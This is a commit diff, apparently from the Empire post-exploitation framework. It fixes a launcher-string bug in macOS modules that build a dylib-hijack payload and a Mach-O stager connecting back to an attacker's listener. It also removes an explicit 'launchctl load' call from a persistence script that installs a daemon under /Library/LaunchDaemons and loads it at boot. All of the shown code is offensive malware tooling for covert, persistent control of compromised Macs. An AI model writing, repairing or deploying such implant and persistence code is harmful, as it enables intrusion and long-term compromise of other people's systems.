Fix for #1059. Fixed launcher string, which caused macho to crash. Removed unnecessary call to launchctl. Plist will be loaded automatically during the boot process
parent
45c08bb9b6
commit
efba9bc368
|
@ -108,7 +108,7 @@ class Module:
|
|||
safeChecks = self.options['SafeChecks']['Value']
|
||||
arch = self.options['Arch']['Value']
|
||||
launcher = self.mainMenu.stagers.generate_launcher(listenerName, language='python', userAgent=userAgent, safeChecks=safeChecks)
|
||||
launcher = launcher.strip('echo').strip(' | python &').strip("\"")
|
||||
launcher = launcher.strip('echo').strip(' | /usr/bin/python &').strip("\"")
|
||||
dylibBytes = self.mainMenu.stagers.generate_dylib(launcherCode=launcher, arch=arch, hijacker='true')
|
||||
encodedDylib = base64.b64encode(dylibBytes)
|
||||
dylib = self.options['LegitimateDylibPath']['Value']
|
||||
|
|
|
@ -97,7 +97,7 @@ class Module:
|
|||
userAgent = self.options['UserAgent']['Value']
|
||||
safeChecks = self.options['SafeChecks']['Value']
|
||||
launcher = self.mainMenu.stagers.generate_launcher(listenerName, language='python', userAgent=userAgent, safeChecks=safeChecks)
|
||||
launcher = launcher.strip('echo').strip(' | python &').strip("\"")
|
||||
launcher = launcher.strip('echo').strip(' | /usr/bin/python &').strip("\"")
|
||||
machoBytes = self.mainMenu.stagers.generate_macho(launcherCode=launcher)
|
||||
encBytes = base64.b64encode(machoBytes)
|
||||
|
||||
|
@ -159,12 +159,9 @@ process.communicate()
|
|||
process = subprocess.Popen('mv /tmp/%s /Library/LaunchDaemons/%s', stdout=subprocess.PIPE, shell=True)
|
||||
process.communicate()
|
||||
|
||||
process = subprocess.Popen('launchctl load /Library/LaunchDaemons/%s', stdout=subprocess.PIPE, shell=True)
|
||||
process.communicate()
|
||||
|
||||
print "\\n[+] Persistence has been installed: /Library/LaunchDaemons/%s"
|
||||
print "\\n[+] Empire daemon has been written to %s"
|
||||
|
||||
""" % (encBytes,plistSettings, programname, plistfilename, plistfilename, plistfilename, plistfilename, plistfilename, plistfilename, plistfilename, plistfilename, programname)
|
||||
""" % (encBytes,plistSettings, programname, plistfilename, plistfilename, plistfilename, plistfilename, plistfilename, plistfilename, plistfilename, programname)
|
||||
|
||||
return script
|
||||
|
|
Loading…
Reference in New Issue